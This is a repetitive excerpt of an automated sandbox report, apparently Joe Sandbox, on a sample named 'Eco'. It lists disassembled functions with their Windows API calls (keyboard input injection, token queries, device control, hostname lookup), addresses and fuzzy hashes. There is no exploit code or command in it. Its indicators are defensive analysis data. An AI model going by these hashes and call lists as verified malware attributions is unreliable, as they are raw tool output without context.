                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00571266
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: 736eb8f2d2adf00dbaaa4ad785aaf98ca01fd953fc9a4255ac74b62dc787e7d9
                          • Instruction ID: 1ad1635344b08d8c667f07ac31c96dd8a799e76f2e1fd4bbfa823d3049152d21
                          • Opcode Fuzzy Hash: 736eb8f2d2adf00dbaaa4ad785aaf98ca01fd953fc9a4255ac74b62dc787e7d9
                          • Instruction Fuzzy Hash: 8E315934A50A189EFF30CA2EAC087FD7FA9BB45310F08C21AF588D61D2C3748955B769
                          APIs
                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 005712D1
                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 005712ED
                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 0057134C
                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0057139E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: 02d9be382c759d0de4aebb279f27d6352ff91c369b42f1a2b0e71e9b6cbf4837
                          • Instruction ID: 3599e32e227c7bcfec95b53dc7a895c91acce0bb8f876b1208f5693626377e58
                          • Opcode Fuzzy Hash: 02d9be382c759d0de4aebb279f27d6352ff91c369b42f1a2b0e71e9b6cbf4837
                          • Instruction Fuzzy Hash: 07314C30D40A089EFF348A6DAC08BFE7FA9BF85310F18CA1AF498465D1C3748959B759
                          APIs
                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0054635B
                          • __isleadbyte_l.LIBCMT ref: 00546389
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 005463B7
                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 005463ED
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                          • String ID:
                          • API String ID: 3058430110-0
                          • Opcode ID: 1223ae78bf0454002d0c1e96b8058243ded96362ea82143d2101bdc3034d492b
                          • Instruction ID: 3c05d4b456761bdaf2d2ae85b8e2203eeb01fbc09e29f56faf467c972215e580
                          • Opcode Fuzzy Hash: 1223ae78bf0454002d0c1e96b8058243ded96362ea82143d2101bdc3034d492b
                          • Instruction Fuzzy Hash: B031AE31600296AFDF258F25C888BEA7FB5FF42318F154928F8248B191D731D850DB92
                          APIs
                          • GetForegroundWindow.USER32 ref: 00595307
                            • Part of subcall function 005739A1: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 005739BB
                            • Part of subcall function 005739A1: GetCurrentThreadId.KERNEL32 ref: 005739C2
                            • Part of subcall function 005739A1: AttachThreadInput.USER32(00000000,?,0057542D), ref: 005739C9
                          • GetCaretPos.USER32(?), ref: 00595318
                          • ClientToScreen.USER32(00000000,?), ref: 00595353
                          • GetForegroundWindow.USER32 ref: 00595359
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                          • String ID:
                          • API String ID: 2759813231-0
                          • Opcode ID: 7ee07b0d6cf5e6afb9b4c9d10885523c011d28e20d21ece800cb9969a0bf8ac1
                          • Instruction ID: 863c33d5d0375ce963761fd59fc0614fc59e6db323c8696628f32e9fbccb8249
                          • Opcode Fuzzy Hash: 7ee07b0d6cf5e6afb9b4c9d10885523c011d28e20d21ece800cb9969a0bf8ac1
                          • Instruction Fuzzy Hash: AF314DB1D00109AFDB00EFA5D8859EFBBF9FF99300F10446AE415E7241EA71AE458FA1
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • GetCursorPos.USER32(?), ref: 0059C8F5
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0054BC1C,?,?,?,?,?), ref: 0059C90A
                          • GetCursorPos.USER32(?), ref: 0059C957
                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0054BC1C,?,?,?), ref: 0059C991
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                          • String ID:
                          • API String ID: 2864067406-0
                          • Opcode ID: c1bc74600c9c3887927ec2d2db5e4007108724330e6731ee4cc2968d1313cacb
                          • Instruction ID: 248e0050d408a9278f54eed031a997e0b0c3a693dbbe3104f20b2440d9ddf43a
                          • Opcode Fuzzy Hash: c1bc74600c9c3887927ec2d2db5e4007108724330e6731ee4cc2968d1313cacb
                          • Instruction Fuzzy Hash: A5316D35601118AFCF259F58C858EEA7FB5FB4F310F04415AF9498B2A1C731A951EFA0
                          APIs
                          • __setmode.LIBCMT ref: 00530B0D
                            • Part of subcall function 0052402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00577CBE,?,?,00000000), ref: 00524041
                            • Part of subcall function 0052402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00577CBE,?,?,00000000,?,?), ref: 00524065
                          • _fprintf.LIBCMT ref: 00530B44
                          • OutputDebugStringW.KERNEL32(?), ref: 0056672F
                            • Part of subcall function 00534BFA: _flsall.LIBCMT ref: 00534C13
                          • __setmode.LIBCMT ref: 00530B79
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                          • String ID:
                          • API String ID: 521402451-0
                          • Opcode ID: 995952ad64ea20fd149a2fd51395b63e364052691167b575b5545c7259de30f1
                          • Instruction ID: 9a8879a8555434b442ebc9e70b82b104b77969593d2cc27065e23f61e8b08297
                          • Opcode Fuzzy Hash: 995952ad64ea20fd149a2fd51395b63e364052691167b575b5545c7259de30f1
                          • Instruction Fuzzy Hash: A91124729042067ADB14B7A8AC5FDBEBF68FFC2320F144156F204971C2DE706D469BA5
                          APIs
                            • Part of subcall function 00568B0B: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00568B22
                            • Part of subcall function 00568B0B: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00568B2C
                            • Part of subcall function 00568B0B: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568B3B
                            • Part of subcall function 00568B0B: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00568B42
                            • Part of subcall function 00568B0B: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00568B58
                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005690A4
                          • _memcmp.LIBCMT ref: 005690C7
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005690FD
                          • HeapFree.KERNEL32(00000000), ref: 00569104
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                          • String ID:
                          • API String ID: 1592001646-0
                          • Opcode ID: 5c2d452377560deca776a22750dccf485690509a70b9b32baf3bd68bdc9e2de1
                          • Instruction ID: 3d7195e9cdae0ae21563008158aaf7c944f80df4437ea92cbde1a2371ae3f309
                          • Opcode Fuzzy Hash: 5c2d452377560deca776a22750dccf485690509a70b9b32baf3bd68bdc9e2de1
                          • Instruction Fuzzy Hash: A9219071E40109EFDB10DFA5C989BEEBBB8FF44321F144059E845A7241E731AB05DB50
                          APIs
                          • GetWindowLongW.USER32(?,000000EC), ref: 00596185
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0059619F
                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 005961AD
                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005961BB
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Window$Long$AttributesLayered
                          • String ID:
                          • API String ID: 2169480361-0
                          • Opcode ID: 58ddcd9b3d6561c4a2d7cfe65248b98033ae9fadb7ca325f64a6c75ebabaea41
                          • Instruction ID: e99bb7b426271a35ef9d8ab80df6b0ded3927c59e2c9e1dae7c987be955667bf
                          • Opcode Fuzzy Hash: 58ddcd9b3d6561c4a2d7cfe65248b98033ae9fadb7ca325f64a6c75ebabaea41
                          • Instruction Fuzzy Hash: 8711D035340515AFEB04AB14DC49FBA7BA9FF8A320F044108F816CB2D2DB74AD44DB91
                          APIs
                            • Part of subcall function 0056F63B: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0056E252,?,?,?,0056F045,00000000,000000EF,00000119,?,?), ref: 0056F64A
                            • Part of subcall function 0056F63B: lstrcpyW.KERNEL32(00000000,?), ref: 0056F670
                            • Part of subcall function 0056F63B: lstrcmpiW.KERNEL32(00000000,?,0056E252,?,?,?,0056F045,00000000,000000EF,00000119,?,?), ref: 0056F6A1
                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0056F045,00000000,000000EF,00000119,?,?,00000000), ref: 0056E26B
                          • lstrcpyW.KERNEL32(00000000,?), ref: 0056E291
                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,0056F045,00000000,000000EF,00000119,?,?,00000000), ref: 0056E2C5
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: lstrcmpilstrcpylstrlen
                          • String ID: cdecl
                          • API String ID: 4031866154-3896280584
                          • Opcode ID: 245a8e406fb8c57f148c30116d6d57b3fe60708d428aeca2442fb245565733f2
                          • Instruction ID: efa57af82a0414833b1405760010c5c8d7a9be00743d50f7253c7d261cd4c0e3
                          • Opcode Fuzzy Hash: 245a8e406fb8c57f148c30116d6d57b3fe60708d428aeca2442fb245565733f2
                          • Instruction Fuzzy Hash: D511903A201305AFDB259F64DC5ADBA7BA9FF85350B40512AF806CB2A0EB719851D790
                          APIs
                          • _free.LIBCMT ref: 00545261
                            • Part of subcall function 0053586C: __FF_MSGBANNER.LIBCMT ref: 00535883
                            • Part of subcall function 0053586C: __NMSG_WRITE.LIBCMT ref: 0053588A
                            • Part of subcall function 0053586C: RtlAllocateHeap.NTDLL(01220000,00000000,00000001,?,00000004,?,?,00530F33,?), ref: 005358AF
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AllocateHeap_free
                          • String ID:
                          • API String ID: 614378929-0
                          • Opcode ID: 56019c1ae0e7ff29b0c26936016668aeb70534ea7497982ccc82189b52f1d6ca
                          • Instruction ID: 8243882767000d82f2675b1a18356c0f197533e70d93c5719c0eede7733d6ad0
                          • Opcode Fuzzy Hash: 56019c1ae0e7ff29b0c26936016668aeb70534ea7497982ccc82189b52f1d6ca
                          • Instruction Fuzzy Hash: 4611063690AB16ABCF213F74AC096AF3F98BF61364F104827F9059A192EE708D409794
                          APIs
                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 005741F2
                          • _memset.LIBCMT ref: 00574213
                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00574265
                          • CloseHandle.KERNEL32(00000000), ref: 0057426E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle_memset
                          • String ID:
                          • API String ID: 1157408455-0
                          • Opcode ID: bea9dc968fbf7ebf9f1184ee110d3c832636d69d24603047574a77d03c02b78b
                          • Instruction ID: 31354d8b5aeb3b9fc079fd5b39f888b9a75b496e6904d9af913bf22ebd49faf0
                          • Opcode Fuzzy Hash: bea9dc968fbf7ebf9f1184ee110d3c832636d69d24603047574a77d03c02b78b
                          • Instruction Fuzzy Hash: BE11E7759022287AD7309BA5AC4DFEBBB7CEF45720F00429AF908E71D0D2744E80CBA4
                          APIs
                            • Part of subcall function 0052402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00577CBE,?,?,00000000), ref: 00524041
                            • Part of subcall function 0052402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00577CBE,?,?,00000000,?,?), ref: 00524065
                          • gethostbyname.WSOCK32(?,?,?), ref: 00586849
                          • WSAGetLastError.WSOCK32(00000000), ref: 00586854
                          • _memmove.LIBCMT ref: 00586881
                          • inet_ntoa.WSOCK32(?), ref: 0058688C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                          • String ID:
                          • API String ID: 1504782959-0
                          • Opcode ID: 198525e047d6ce3ef75cbdcc71f05f46e200cc5e9ca53527206dcc1553be0395
                          • Instruction ID: 35369f40c1982b36ec6c29368c65ad4ed837b735ed7b152fd04296866d9d1464
                          • Opcode Fuzzy Hash: 198525e047d6ce3ef75cbdcc71f05f46e200cc5e9ca53527206dcc1553be0395
                          • Instruction Fuzzy Hash: 5E114F7650010AAFCB00FBA4D94ACEEBBB8FF55310B544065F505B72A1DF30AE44DB91
                          APIs
                          • SendMessageW.USER32(?,000000B0,?,?), ref: 005694FC
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0056950E
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00569524
                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0056953F
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 9b238afd167026f4c3c645871f935d274e502f70eb853acbf015ea926ae88342
                          • Instruction ID: 59f92b1e65d239b8c0df6fa48c95aba3a3115d1c93ca5bd8ef44d537481d3f9c
                          • Opcode Fuzzy Hash: 9b238afd167026f4c3c645871f935d274e502f70eb853acbf015ea926ae88342
                          • Instruction Fuzzy Hash: D7114879900218FFEB11DFA9C884EADBBB8FF48710F204095EA01B7290D671AE11DB90
                          APIs
                            • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                          • DefDlgProcW.USER32(?,00000020,?), ref: 005116B4
                          • GetClientRect.USER32(?,?), ref: 0054B86C
                          • GetCursorPos.USER32(?), ref: 0054B876
                          • ScreenToClient.USER32(?,?), ref: 0054B881
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Client$CursorLongProcRectScreenWindow
                          • String ID:
                          • API String ID: 4127811313-0
                          • Opcode ID: 792c056d870fc31e6f96bb6a5402734d978682aaf838f8265182e8c1d27e7866
                          • Instruction ID: 6d0df52389df7aa1c5f5bf5d7bf0fea833c911dcf7a4908b5d0422f7e433a077
                          • Opcode Fuzzy Hash: 792c056d870fc31e6f96bb6a5402734d978682aaf838f8265182e8c1d27e7866
                          • Instruction Fuzzy Hash: E3115835A0041AAFEB10EF58C8899FE7BB8FB45301F000496FA02EB550C731BA95DBA5
                          APIs
                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
                          • GetStockObject.GDI32(00000011), ref: 00512163
                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 0051216D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CreateMessageObjectSendStockWindow
                          • String ID:
                          • API String ID: 3970641297-0
                          • Opcode ID: 0c869c3c321db55cc8818d83b6b336ffbb1ccfd5bea958cf362a2dadba8f4885
                          • Instruction ID: 337581a6cf207a8f9e5e87e5d7c6fdca917ca9ee773c7e78303407e8b343734c
                          • Opcode Fuzzy Hash: 0c869c3c321db55cc8818d83b6b336ffbb1ccfd5bea958cf362a2dadba8f4885
                          • Instruction Fuzzy Hash: 6B116D72541549BFEF129F90DC45EEA7FA9FF69354F040116FA0452160D731DCA1EBA0
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00570358,?,005713AB,?,00008000), ref: 005717CA
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00570358,?,005713AB,?,00008000), ref: 005717EF
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00570358,?,005713AB,?,00008000), ref: 005717F9
                          • Sleep.KERNEL32(?,?,?,?,?,?,?,00570358,?,005713AB,?,00008000), ref: 0057182C
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CounterPerformanceQuerySleep
                          • String ID:
                          • API String ID: 2875609808-0
                          • Opcode ID: fedd0a284621016474c4a0493660a923ebe76ad15550ba0d81dcb53cdd62d13a
                          • Instruction ID: 2f48ccc28d2e2045f6dc476b585073ca1924268233aff1d91e1577d92acc3151
                          • Opcode Fuzzy Hash: fedd0a284621016474c4a0493660a923ebe76ad15550ba0d81dcb53cdd62d13a
                          • Instruction Fuzzy Hash: 55115E31D00A1CDBCF04AFA8E988AEEBF78FF19701F008055D945B6280CB305554EB9A
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
